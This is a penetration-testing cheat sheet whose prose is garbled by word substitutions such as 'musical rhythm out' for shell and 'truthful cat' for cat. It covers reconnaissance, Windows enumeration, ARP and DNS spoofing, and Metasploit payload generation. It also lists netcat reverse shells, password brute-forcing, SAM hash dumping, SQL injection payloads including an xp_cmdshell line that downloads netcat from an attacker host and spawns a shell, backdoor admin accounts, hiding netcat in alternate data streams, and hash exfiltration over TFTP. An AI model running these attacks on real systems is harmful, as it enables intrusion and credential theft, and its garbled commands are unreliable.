Networking
Services
Basics
Footprinting
Scanning
Windows Enumeration
ARP Spoofing
Exploits
Metasploit Framework 3
What to exercise afterwards gaining a remote shell
What to exercise afterwards gaining a remote shell
TFTP
Netcat
Passwords
Physical Access
SQL Injection
Alternate Data Streams
A White Hat’s Pen Test
Before y'all begin, modify your origin password using passwd.
Networking
dhcpcd -get a novel IP address
Renew dynamic IP address:
dhcpcd -k -release IP address
ifconfig eth0 up -bring upwardly the NIC
dhcpcd -get a novel IP address
Static IP address:
ifconfig eth0 192.168.0.100/24 -set IP address & sub internet mask
road add together default gw 192.168.0.1 -set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf -set DNS server
Services:
Apache server:
apachectl start -start server on TCP port 80
apachectl stop - halt server
SSH server:
sshd-generate -generate ssh keys
/usr/sbin/sshd -start server on TCP port 22
pkill sshd -stop server
ssh user@targetIP
TFTP server:
atftpd --daemon --port 69 /tmp/ -start server on UDP port 69 amongst a origin directory of tmp
pkill tftpd -stop server
VNC server:
Vncserver -start server on TCP port 5901
pkill Xvnc -stop server
Check what ports are listening:
netstat –ant -show listening TCP ports
netstat –anu -show listening UDP ports
netstat -ant | grep 22 -verify ssh has started
netstat -anu | grep 69 -verify tftp has started
1. Basics
Mount a local difficult drive:
mountain /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
part <user> <targetIP> <remote share>
part admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share -umount share
umount /mnt/share -umount share
Edit a file:
nano test.sh -create a novel file too opened upwardly it
<ctrl> x -exit
Y -save modified buffer
<enter> -write changes
chmod 755 test.sh -make the file executable
./test.sh -run the file
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a novel program:
tar zxvf program.tar.gz -method 2: bzip2 -cd program.tar.bz2 | tar xvf -
cd to the novel plan folder
./configure
make
su root
brand install
Footprinting
Whois:
whois target.com -contact info, emails, dates, call servers
whois targetIP -network range
DNS:
dig target.com whatever
A
PTR
NS
SOA
SRV
MX
Scanning
scanrand -b10M targetIP:quick
nmap:
-sS - TCP SYN scan or Stealth, one-half opened upwardly (default)
-sU - UDP scan
-sT - TCP total connect (very noisy)
-PN - don't ping
-n - no contrary DNS lookup
-A - combines -O too -sV
-O - OS fingerprinting
-sV - service version (banner)
-p - ports to scan (T:port,U:port)
-T - timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL - input listing of hosts to scan
-oG - grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p opened upwardly ports -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
AMAP:
Take the results from nmap too cheque for services on uncommon ports.
amap -i scan.txt
OS Fingerprinting:
p0f -i eth0 -U –p - operate interface eth0, don’t display unknown signatures, promiscuous
point a browser to the targetIP - read traffic on p0f
xprobe2 -B targetIP
Banner Grabbing
nc targetIP port - cheque if the port is open
nc 10.1.1.2 80
telnet targetIP port - telnet may yield slightly dissimilar results
HEAD /HTTP/1.0
<enter 2x>
wget targetIP - downloads the index.html file
wget targetIP - downloads the index.html file
cat index.html | more - stance file i page at a time, infinite bar for adjacent page
q -quit or instruct out file
Windows Enumeration
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP - cheque to run into if NetBIOS is enabled
smbgetserverinfo -i targetIP - name, OS too workgroup
smbgetserverinfo -i targetIP - name, OS too workgroup
smbdumpusers -i targetIP - listing users
smbclient -L //targetIP - listing shares
smbclient -L //targetIP - listing shares
Using Windows
net operate \\targetIP\ipc$ "" /u:"" - get-go a NULL session
smbclient:
smbclient -L hostName -I targetIP - enumerate shares
smbclient -L hostName/share -U "" - connect to opened upwardly part amongst a blank user name
smbclient -L hostName -I targetIP -U admin - connect to opened upwardly part amongst user call admin
RPCclient
rpcclient targetIP -U “” - start a NULL session
netshareenum - enumerate shares
enumdomusers - enumerate users
lsaenumsid - enumerate domain SIDs
queryuser RID - user info, endeavour 500, 501, 1000, 1001
createdomuser - create user account
ARP Spoofing
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines nether iptables .
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this 2 times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
Exploits
cd /pentest/exploits/milw0rm
truthful cat sploitlist.txt | grep -i exploit
Some versions may survive written for compilation nether Windows, piece others for Linux.
You tin position the environs yesteryear inspecting the headers.
truthful cat exploit | grep "#include"
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
Grep out Windows headers, to leave of absence alone Linux based exploits:
truthful cat sploitlist.txt | grep -i exploit | cutting -d " " -f1 | xargs grep sys | cutting -d ":" -f1 | form -u
Metasploit Framework three
svn update -module updates.
Web Interface:
./msfweb -opens a browser at http://127.0.0.1:55555
Console:
./msfconsole
help
show exploits -show all exploits
search <name> -search for an exploit
use <exploit name>
show options
set <OPTION NAME> <option> -set RHOST 10.1.1.2
show payloads
set PAYLOAD <payload name>
exhibit options
exhibit options
set <OPTION NAME> <option> -set LHOST 10.1.1.2
show targets
set TARGET <target number> -set TARGET 0
exploit -you may demand to run the exploit to a greater extent than than i time for it to work
sessions –l -list all sessions
sessions -i <id> -sessions –i four , interact amongst session 4
<ctrl> z -detach from session
<ctrl> c -kill a session
Jobs -list exploits jobs running
jobs –K -kill all jobs
Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: contrary musical rhythm out
Automated:
db_import_nessus_nbe -import Nessus results inward NBE format
db_import_nmap_xml -import nmap results inward XML format (-oX)
./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP -run map through the framework too shop results inward database
db_hosts -show hosts discovered
db_services -show services running on each host
db_autopwn -show options
db_autopwn -t -p –e -select modules based on opened upwardly ports, exhibit matching exploits, exploit
Command Line Interface:
./msfcli | grep -i <name> -search for an exploit or auxiliary
./msfcli | grep -i <name> -search for an exploit or auxiliary
./msfcli <exploit or auxiliary> S -summary info
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
Payload generator:
./msfpayload <payload> <variable=value> <output type>
S summary too options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to survive piped into msfencode too other tools
J JavaScript
X executable (Windows only)
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
Encode shellcode:
./msfencode <options> <variable=value>
Pipe the output of msfpayload into msfencode, exhibit bad characters too listing available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder too format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c
What to exercise afterwards gaining a remote musical rhythm out
Hostname - call of computer
net users -list users
net user x hack /add -add user “x” amongst password “hack”
net user x /add -add user “x” amongst NO password
net localgroup -list safety groups
net localgroup administrators -list users inward Administrators group
net localgroup administrators x /add -add user “x” to Administrator group
Don't operate interactive programs similar FTP from a remote shell.
TFTP
assault box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files amongst read alone attributes. So to delete the file:
attrib -r nc.exe
del nc.exe
Netcat
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024 -scan port 1 to 1024
nc -v -z 10.1.1.2 1-1024 -scan port 1 to 1024
Chat session:
target: nc –lvp 4444 - get-go Netcat too heed verbosely on port 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 < test.txt
Bind shell:
target: nc -lvp 4444 -e cmd.exe -should survive sitting at a ascendence prompt of the target
attacker: nc -v 10.1.1.2 4444
Reverse shell:
target: nc -lvp 4444
attacker: nc -v 10.1.1.2 4444 -e /bin/bash
The target should survive sitting at an invisible ascendence prompt of the attacker.
You volition non run into a prompt. Issue whatever linux ascendence to verify.
Passwords
Word list:
zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp amongst a user call ftp
hydra -l ftp -P words -v targetIP ftp
pop3 amongst a user call muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf -f switch volition read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM file:
%SYSTEMROOT%/system32/config -backup re-create non locked yesteryear the OS
%SYSTEMROOT%/repair
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x -where is is Channel created.
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a novel file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Physical Access
Mount a NTFS part inward read/write mode:
Boot your box amongst Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
truthful cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do y'all actually wishing to modify it? y
Write hive files? y
unmount /mnt/sda1
reboot
SQL Injection
nmap -sS -p 1521 targetIP -Oracle
nmap -sS -p T:1433,U:1434 targetIP -MS SQL
Release Version of Sqlservr.exe
SQL Server 2000 RTM 2000.80.194.0
SQL Server 2000 SP1 2000.80.383.0
SQL Server 2000 SP2 2000.80.534.0
SQL Server 2000 SP3 2000.80.760.0
SQL Server 2000 SP3a 2000.80.760.0
SQL Server 2000 SP4 2000.80.00.2039
SQL Server 2005 RTM 2005.90.1399
SQL Server 2005 SP1 2005.90.2047
SQL Server 2005 SP2 2005.90.3042
Authentication bypass:
' or 1=1-- -minus minus closes the SQL query, everything afterwards it is ignored
Enumerating tabular array names:
' having 1=1--
' grouping yesteryear tabular array having 1=1--
' grouping yesteryear table, table2 having 1=1--
' grouping yesteryear table, table2, table3 having 1=1--
Enumerating column types:
matrimony conduct sum(column) from tabular array --
matrimony conduct sum(column2) from tabular array --
Adding data:
' ; insert into tabular array values('value','value2','value3')--
MS SQL stored procedure:
Output the database information into an html file, that y'all tin stance amongst a browser.
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --
Run ipconfig on target too write to a file, that y'all tin stance amongst a browser.
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--
Upload netcat too spawn a contrary shell.
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --
attacker: nc -lvp 53
Alternate Data Streams
Hide netcat within a text file. Note netcat must survive located inward the electrical current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
get-go ./test.txt:nc.exe
A White Hat's Pen Test yesteryear Muts
nslookup
ready type=ns
ready type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal postal service server inward config file.
nc -n internalserver.com 80
Edit config file to opened upwardly to a greater extent than port on the router, 135,139,445,1000
Use Metasploit to shipping RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes amongst rainbow table.
Use Remote Desktop to connect to server.
Hope it comes inward handy inward times of need!